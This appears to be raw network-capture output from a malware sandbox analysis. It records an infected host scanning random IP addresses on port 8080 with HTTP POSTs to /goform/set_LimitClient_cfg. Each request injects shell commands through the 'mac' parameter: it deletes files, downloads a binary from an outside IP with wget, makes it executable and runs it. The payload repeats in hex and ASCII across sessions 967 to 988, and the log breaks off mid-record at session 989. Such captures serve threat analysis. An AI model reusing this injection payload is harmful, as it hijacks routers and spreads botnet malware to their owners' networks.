                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        967192.168.2.2355858123.235.23.1628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440130949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        968192.168.2.2334546110.143.60.68080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440150976 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        969192.168.2.2356508203.30.150.2068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440177917 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        970192.168.2.234140464.189.253.1048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440201044 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        971192.168.2.23472562.32.95.28080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440222025 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        972192.168.2.234150099.145.245.1848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440253019 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        973192.168.2.233356079.134.185.2188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440282106 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        974192.168.2.2339470163.236.46.858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440396070 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        975192.168.2.234046013.73.241.1678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440433979 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        976192.168.2.234985219.179.228.2388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440469980 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        977192.168.2.233702454.235.123.308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440506935 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        978192.168.2.2353660106.238.193.2238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440557957 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        979192.168.2.235135017.169.215.208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440603971 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        980192.168.2.2357390201.190.104.1168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440650940 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        981192.168.2.235708064.253.111.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440676928 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        982192.168.2.2355016121.44.47.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440733910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        983192.168.2.2353898165.29.104.1008080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440759897 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        984192.168.2.2339312133.59.142.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440785885 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        985192.168.2.234850225.180.194.1308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440799952 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        986192.168.2.2359406124.47.158.198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440872908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        987192.168.2.236025877.204.84.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440872908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        988192.168.2.2333222113.39.85.1368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440927029 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        989192.168.2.2349748152.26.164.368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440965891 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
